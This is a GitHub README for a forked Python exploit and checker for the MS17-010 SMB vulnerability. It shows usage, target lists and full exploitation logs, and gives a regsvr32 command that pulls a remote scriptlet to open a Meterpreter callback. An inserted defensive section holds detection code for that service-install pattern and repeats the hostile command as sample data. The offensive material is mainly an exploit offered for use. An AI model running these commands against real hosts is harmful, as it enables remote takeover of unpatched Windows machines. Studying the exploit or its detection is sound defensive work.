
This project forked from mez-0/ms17-010-python

MS17-010: Python and Meterpreter

Home Page: https://mez0.cc/posts/weaponised-worawit.html

License: MIT License

MS17-010: Python

All credit goes to Worawit:

Worawit Wang: GitHub

Worawit Wang: Twitter

Worawit Wang released a collection of Python exploits for MS17-010. These tools worked far more reliably than the Metasploit modules but didn't have much of a payload besides writing a pwned.txt to the C:/. However, Worawit Wang did add functionality for creating a service.

Korey McKinley wrote an article utilising that function to create a service which used regsvr32 to call back to Meterpreter and create a full Meterpreter connection. I'd never seen that path to exploitation, so I thought I'd modify zzz_exploit.py with Korey's logic and make the script more dynamic and user friendly.

However, the module Korey used in that blog article was not available in my version of Metasploit. It is now called web_delivery.

There are two pieces, zzz_checker.py and zzz_exploit.py. Both are self-explanatory.


Exploit Usage

➜  MS17-010 git:(master) ✗ ./zzz_exploit.py --help
usage: zzz_exploit.py [-h] [-u] [-p] -t  [-c] [-P] [--version]

Tested versions:
1	Windows 2016 x64
2	Windows 10 Pro Vuild 10240 x64
3	Windows 2012 R2 x64
4	Windows 8.1 x64
5	Windows 2008 R2 SP1 x64
6	Windows 7 SP1 x64
7	Windows 2008 SP1 x64
8	Windows 2003 R2 SP2 x64
9	Windows XP SP2 x64
10	Windows 8.1 x86
11	Windows 7 SP1 x86
12	Windows 2008 SP1 x86
13	Windows 2003 SP2 x86
14	Windows XP SP3 x86
15	Windows 2000 SP4 x86

optional arguments:
  -h, --help        show this help message and exit
  -u , --user       Username to authenticate with
  -p , --password   Password for specified user
  -t , --target     Target for exploitation
  -c , --command    Command to add to service
  -P , --pipe       Pipe to connect to
  --version         show program's version number and exit
Example: python zzz_exploit -t 192.168.0.1-100 -c 'regsvr32 /s /n /u /i:http://192.168.0.1:9000/1EsrjpXH2pWdgd.sct scrobj.dll'

Sample output

> # python zzz_exploit.py -t 10.10.11.53
[08:50:24]  [INFO]:     TARGET: 10.10.11.53
[08:50:24]  [ACTION]:   CONNECTING TO TARGET...
[08:50:24]  [ACTION]:   GETTING TARGET OS...
[08:50:24]  [INFO]:     TARGET OS: Windows Server 2012 R2 Datacenter 9600
[08:50:24]  [ACTION]:   GETTING PIPE...
[08:50:25]  [INFO]:     USING PIPE: spoolss
[08:50:25]  [INFO]:     TARGET ARCHITECTURE: 64 bit
[08:50:25]  [INFO]:     FRAG SIZE: 0x20
[08:50:25]  [INFO]:     GROOM_POOL_SIZE: 0x5030
[08:50:25]  [INFO]:     BRIDE_TRANS_SIZE: 0xf90
[08:50:25]  [ERROR]:    No transaction struct in leak data
[08:50:25]  [ERROR]:    LEAK FAILED! RETRYING...
[08:50:26]  [ERROR]:    No transaction struct in leak data
[08:50:26]  [ERROR]:    LEAK FAILED! RETRYING...
[08:50:26]  [ERROR]:    No transaction struct in leak data
[08:50:26]  [ERROR]:    LEAK FAILED! RETRYING...
[08:50:26]  [INFO]:     CONNECTION: 0xffffe001c6257910
[08:50:26]  [INFO]:     SESSION: 0xffffc000fab68150
[08:50:26]  [INFO]:     FLINK: 0xffffc000fafcd098
[08:50:26]  [INFO]:     InParam: 0xffffc000faf9116c
[08:50:26]  [INFO]:     MID: 0x3903
[08:50:26]  [ERROR]:    unexpected alignment, diff: 0x3b098
[08:50:26]  [ERROR]:    LEAK FAILED! RETRYING...
[08:50:27]  [INFO]:     CONNECTION: 0xffffe001c6257910
[08:50:27]  [INFO]:     SESSION: 0xffffc000fab68150
[08:50:27]  [INFO]:     FLINK: 0xffffc000fafd9098
[08:50:27]  [INFO]:     InParam: 0xffffc000fafd316c
[08:50:27]  [INFO]:     MID: 0x3a03
[08:50:27]  [SUCCESS]:  SUCCESS CONTROLLING GROOM TRANSACTION
[08:50:27]  [ACTION]:   MODIFYING TRANS1 STRUCT FOR READ/WRITE
[08:50:27]  [ACTION]:   CREATING SYSTEM SESSION TO SMB...
[08:50:28]  [ACTION]:   OVERWRITING SESSION SECURITY CONTEXT
[08:50:28]  [INFO]:     Writing command to service:
[08:50:28]  [ACTION]:   OPENING SVCManager ON 10.10.11.53...
[08:50:28]  [ACTION]:   CREATING SERVICE PKfJ...
[08:50:28]  [ACTION]:   STARTING SERVICE PKfJ...
[08:50:29]  [ERROR]:    SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
[08:50:29]  [ACTION]:   REMOVING SERVICE PKfJ...
[08:50:29]  [SUCCESS]:  FINISHED!
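From the defender's side, the path described above leaves a concrete trace: a service is installed whose command line is regsvr32 loading scrobj.dll with a remote .sct scriptlet, exactly the shape of the README's example command. The following is an added example (not part of this project) that classifies constructed Windows System log 7045 "service installed" records for that pattern; the record layout, the benign control entries and the four-letter-name heuristic are assumptions made here.

```python
import re

# Constructed records in the shape of Windows System log event 7045
# ("A service was installed in the system"). The first mirrors the service the
# README's exploit example would register (name taken from the sample output,
# command from the usage example); the other two are benign controls.
SAMPLE_EVENTS = [
    {"event_id": 7045, "service_name": "PKfJ", "account": "LocalSystem",
     "image_path": "regsvr32 /s /n /u /i:http://192.168.0.1:9000/1EsrjpXH2pWdgd.sct scrobj.dll"},
    {"event_id": 7045, "service_name": "Spooler", "account": "LocalSystem",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"event_id": 7045, "service_name": "VendorUpdate", "account": "LocalSystem",
     "image_path": r"regsvr32 /s C:\Program Files\Vendor\update.dll"},
]

# regsvr32's /i: (or -i:) switch pointing at an http(s) URL, i.e. a remote scriptlet.
REMOTE_SCRIPTLET = re.compile(r"[/-]i:\s*https?://", re.IGNORECASE)


def classify_service_install(event):
    """Return the reasons a 7045 record resembles the regsvr32 call-back service
    the README describes. An empty list means the record did not match."""
    if event.get("event_id") != 7045:
        return []
    path = event.get("image_path", "")
    low = path.lower()
    reasons = []
    if "regsvr32" in low and REMOTE_SCRIPTLET.search(path):
        reasons.append("regsvr32 registering a remote scriptlet via /i:http(s)")
    if "regsvr32" in low and "scrobj.dll" in low:
        reasons.append("scrobj.dll handed to regsvr32")
    # Heuristic only: the sample output shows a short random-looking name (PKfJ).
    if reasons and re.fullmatch(r"[A-Za-z]{4}", event.get("service_name", "")):
        reasons.append("four-letter random-looking service name")
    return reasons


def find_suspicious(events):
    """Map service name -> reasons for every record that matched at least once."""
    hits = {}
    for event in events:
        reasons = classify_service_install(event)
        if reasons:
            hits[event["service_name"]] = reasons
    return hits


if __name__ == "__main__":
    for name, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(f"{name}: {'; '.join(reasons)}")
```

A local regsvr32 registration (the VendorUpdate control) does not match, so the rule keys on the remote scriptlet and scrobj.dll rather than on regsvr32 alone.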

Checker Usage

usage: checker.py [-h] [-u] [-p] [-t] [-tf] [--version]

MS17-010 Checker script

optional arguments:
  -h, --help            show this help message and exit
  -u , --user           Username to authenticate with
  -p , --password       Password for specified user
  -t , --target         Target (IP, range, CIDR) to check for MS17-010
  -tf , --target-file   Read from file. Can interpret CIDR and IP.
  --version             show program's version number and exit

Example: python checker.py -t 192.168.0.1-100

Sample output

> # python checker.py -t 10.10.11.53
[08:37:25]  [INFO]: 	CONNECTED TO 10.10.11.53
[08:37:25]  [INFO]: 	TARGET OS: Windows Server 2012 R2 Datacenter 9600
[08:37:25]  [SUCCESS]: 	10.10.11.53 IS NOT PATCHED!
[08:37:25]  [ACTION]: 	CHECKING NAMED PIPES...
[08:37:25]  [SUCCESS]: 	spoolss: OK (64 bit)
[08:37:26]  [SUCCESS]: 	samr: OK (64 bit)
[08:37:26]  [SUCCESS]: 	netlogon: OK (64 bit)
[08:37:26]  [SUCCESS]: 	lsarpc: OK (64 bit)
[08:37:26]  [ERROR]: 	browser: STATUS_OBJECT_NAME_NOT_FOUND

Contributors: mez-0, thegundy
